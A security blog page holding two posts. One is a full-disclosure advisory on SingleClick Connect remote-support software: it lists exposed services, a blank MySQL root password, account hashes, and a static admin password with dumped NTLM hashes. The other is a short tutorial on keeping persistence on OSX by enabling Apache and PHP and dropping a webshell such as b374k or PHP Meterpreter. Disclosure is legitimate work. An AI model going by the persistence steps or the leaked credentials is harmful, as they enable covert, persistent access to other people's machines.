Projects Publications Brandon

Monday, September 15, 2014

Full Disclosure - SingleClick Connect

By With No comments:
Update:
I originally posted this to the Full Disclosure mailing list but for some reason it wasn’t accepted via the moderator so I’m posting it here. First, so that the information does get out there, and second to see if anyone knows why it may have been rejected.

I was helping out a family member with their computer when it came up that they “already had remote help software” (SingleClickConnect or SCC), when I asked what this was, the family member said it was installed by Dell Support when trying to fix their issue. This was in 2008. I removed it, and helped to fix the issue.

In 2010 another issue arose on the new computer (Dell again) of the same family member. Again, calling support first they had installed this software.

Disclaimer: I can not say for certain that it was Dell’s support rep, or even that it was them that installed it, but if Dell is using this as a means of support they should probably cease for the following reasons: Apache (port 40080) listening 0.0.0.0, MySQL (port 17771) listening 127.0.0.1, PHP, and UltraVNC (5900) are installed as a part of the software package.


ISSUE #1

Without decoding the ionCube “copyright protecting” software a large number of XSS, CSRF, and SQLi vulnerabilities were found, all unauthenticated to the web app that runs there.

No specifics are being posted on these vulnerabilities as I assume the site on the net (company’s site), where a registered user would log in are the same as the ones locally hosted (at least the app looks the same and has similar page structure)

ISSUE #2

MySQL’s root password is blank and there are two other default accounts as well allowing easy privilege escalation to SYSTEM (via the SCC local account – see ISSUE #5):

dsl *7E1CA3417E3A159A9188657F44C7034A8E9FDFF2
tera *B2744A6BC5E8B1667BE5AED0111A2B941356E4A4

^ uncracked at this point. For all I know they could be randomized at install

ISSUE #3

Another service listens on 0.0.0.0 via port 17667 that I haven’t been able to identify, however when you connect to the socket, it starts listing users, services, printers and interfaces (and that is without sending any data to it).

$ ncat 172.16.102.149 17667
8�TXPBASELINEXP_BASEP�RAdministratorGuestHelpAssistantSingleClick
AdminSUPPORT_388945a0!aCACAMD PCNET Family PCI Ethernet Adapter -
Packet Scheduler Miniport{47F69AAC-AE9A-40A9-88F5-A246A169CE92}�f�
)�n�����f�f��fDownloadsC:\Documents and Settings\Administrator\My
Documents\DownloadsMicrosoft XPS Document
WriterXPSPortprinter#:2TPVM#:1TPVMACDWindows FirewallMicrosoftCreative
Sound Blaster PCI

ISSUE #4

When UltraVNC is installed, it uses the same password as the one for your ‘registered’ account (just password auth) and listens on 0.0.0.0. It is easily to decrypt from the UltraVNC.ini that is located in %ApplicationData% for the user

ISSUE #5

A local account called “SingleClick Admin” is installed with a static password and added to the Administrators group. 3 services are also installed with the SingleClick Admin account as the user it runs under:

Package d'authentification  : NTLM
Utilisateur principal       : SingleClick Admin
     msv1_0 :     lm{ 7a9793d3082ba83b790ce07b3bdf85ea }, ntlm{ 2c292724d67fcf310d1c4dd153467be8 }
     kerberos :     ~!3no1972!~
     ssp :
     wdigest :     ~!3no1972!~

 8. Name         : _SC_Apache2.2
 8. Service      : .\SingleClick Admin
 8. Current      : ~!3no1972!~

 9. Name         : _SC_dsl-fs-sync
 9. Service      : .\SingleClick Admin
 9. Current      : ~!3no1972!~
 9. Old          : ~!3no1972!~

10. Name         : _SC_hnmsvc
10. Service      : .\SingleClick Admin
10. Current      : ~!3no1972!~

CONCERN #1

As far as I can tell the software continuously scans you local network for other computers and file system for changes and reports these back to the central server so that when you login to their service you can see your files and connect to other systems in the LAN of the machine SingleClickConnect is installed on.

CONCERN #2

The user account password that you use to register and connect remotely is stored in the database. This actually looks decently done, or I just haven’t been able to identify the storage

Database: p2p
Table:    config_info
Value:    “user_hash”

CONCERN #3

Not sure what this registry key contains other than being named Cred4RA and assuming it’s credentials for the remote administration. Hopefully encrypted some how.

[HKEY_LOCAL_MACHINE\SOFTWARE\SingleClick Systems\Advanced Networking
Service\Settings\Remote Access]
"ConfigState"=dword:00000001
"Cred4RA"=hex:01,00,00 (snip snip)

Additional Information

Vendor Contact

  • Email sent in 2010 July about issues 1 – 5
    • No reply, and forgot about until 2013 when the software was mentioned by a friend (if I had ever heard of it)
  • 2013 April – Email sent again, forwarding original, bounced back as account unknown
  • 2014 August – Accidentally found notes while searching for something else, attempted to relocate the software via Archive.org with the feeling that the site had gone away and happened upon the new site,, downloaded software, confirmed issues, and forwarded the email to the new point of contact at the new domain. No response.
  • 2014 September, Full disclosure.
  • Dell… If your techs do actually use this software for support (I hope not) in any form or fashion, you are putting each one of them at a pretty high risk.
Read More

Tuesday, September 09, 2014

OSX Persistence via PHP Webshell

By With No comments:
As I learn more and more about OSX I find things that surprise me. For instance, in this post I will be showing you how to, with root or sudo privilege, enable the built-in apache server on OSX and it’s PHP module….

I am working with OSX Mavericks so your locations may vary based on the version of OSX your target it.

First things first is to enable the PHP module for the Apache server.

sudo nano -w /etc/apache2/httpd.conf

(vi or emacs to your heart’s content). But what we are looking for is to uncomment the following line:

#LoadModule php5_module libexec/apache2/libphp5.so

Once you do that, start up Apache. This can be done temporarily (won’t survive a reboot) with the apachectl command:

sudo apachectl start

Or you can make it more permanent with launchctl:

sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist

And undoing the damage with:

sudo launchctl unload -w /System/Library/LaunchDaemons/org.apache.httpd.plist

After that, just drop your favorite PHP shell into the /Library/WebServer/Documents/ directory and you’re done. (My favorites are b374k and PHP Meterpreter).


Read More
Home About-us Privacy Policy Contact-us Services
Design By Templateclue